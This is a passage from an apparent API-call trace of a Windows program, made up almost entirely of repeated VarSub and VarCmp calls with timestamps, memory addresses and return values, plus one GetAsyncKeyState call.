pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.778] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.778] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.778] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.778] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.778] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.778] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.778] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.778] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.778] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.778] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.778] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.778] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.778] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.779] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.779] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.779] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.779] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.779] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.779] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.779] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.779] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.779] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.779] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.779] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.779] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.779] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.779] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.779] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.779] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.779] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.779] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.779] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.779] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.779] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.789] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.789] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.789] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.789] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.789] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.789] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.789] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.789] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.790] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.790] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.790] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.790] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.790] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.790] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.790] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.790] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.790] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.790] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.790] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.790] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.790] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.790] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.790] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.790] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.790] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.790] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.790] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.790] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.791] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.791] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.791] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.791] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.791] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.791] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.791] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.791] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.791] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.791] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.791] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.791] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.791] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.791] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.791] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.791] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.791] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.791] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.791] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.791] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.792] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.792] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.792] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.792] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.792] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.792] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.792] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.792] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.792] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.792] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.792] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.847] GetAsyncKeyState (vKey=3) returned 0 [0112.907] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.908] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.908] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.908] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.908] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.908] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.908] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.908] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.908] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.908] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.908] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.908] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.908] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.908] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.908] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.908] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.908] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.908] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.908] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.908] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.908] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.908] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.908] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.908] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.909] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.909] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.909] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.909] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.909] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.909] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.909] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.909] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.909] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.909] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.909] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.909] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.909] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.909] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.909] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.909] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.909] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.909] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.909] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.909] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.909] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.909] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.909] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.909] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.909] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.909] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.909] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.909] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.909] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.909] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.909] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.909] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.910] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.910] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.910] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.910] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.910] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.910] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.910] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.910] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.910] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.910] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.910] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.910] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.910] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.910] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.910] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.910] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.910] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.910] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.910] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.910] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.910] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.910] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.910] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.910] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.910] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.910] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.910] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.910] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.910] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.910] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.910] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.910] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.910] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.911] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.911] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.911] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.911] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.911] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.911] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.911] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.911] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.911] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.911] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.911] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.911] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.911] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.911] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.911] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.911] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.911] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.911] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.911] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.911] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.911] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.911] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.911] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.911] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.911] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.911] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.911] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.911] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.911] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.911] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.911] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.911] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.912] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.912] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.912] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.912] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.912] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.912] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.912] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.912] VarCmp (pvarLeft=0x19790c, 